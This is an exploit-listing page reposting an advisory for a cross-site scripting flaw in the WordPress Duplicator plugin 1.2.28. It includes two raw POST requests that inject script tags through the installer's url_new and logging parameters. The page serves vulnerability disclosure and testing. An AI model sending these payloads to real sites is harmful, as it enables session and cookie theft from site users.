Advertisement






WordPress Duplicator Migration 1.2.28 Cross Site Scripting

CVE Category Price Severity
CVE-2021-24209 CWE-79 $500 High
Author Risk Exploitation Type Date
exploitalert.com High Remote 2017-11-07
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017110045

Below is a copy:

WordPress Duplicator Migration 1.2.28 Cross Site Scripting
Class Input Validation Error
Remote  Yes

Credit Ricardo Sanchez
Vulnerable Duplicator a WordPress Migration Plugin 1.2.28

Duplicator a WordPress Migration Plugin is prone to a stored cross-site
scripting
vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the
browser of an unsuspecting user in the context of the affected site. This
may allow the attacker to steal cookie-based authentication credentials and
to launch other attacks.

To exploit this issue following steps:
The XSS reflected because the values are not filter correctly:


Demo Request POST:

POST
/wordpress//wp-content/plugins/duplicator/installer/build/view.step4.php
HTTP/1.1
Host: localhost
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.8
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

url_new="><script>alert(1)</script>demo




Demo 2 Request POST:

POST
/wordpress//wp-content/plugins/duplicator/installer/build/view.step2.php
HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Upgrade-Insecure-Requests: 1
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: es-ES,es;q=0.8
Cookie:
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 37

logging="><script>alert(1)</script>demo

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum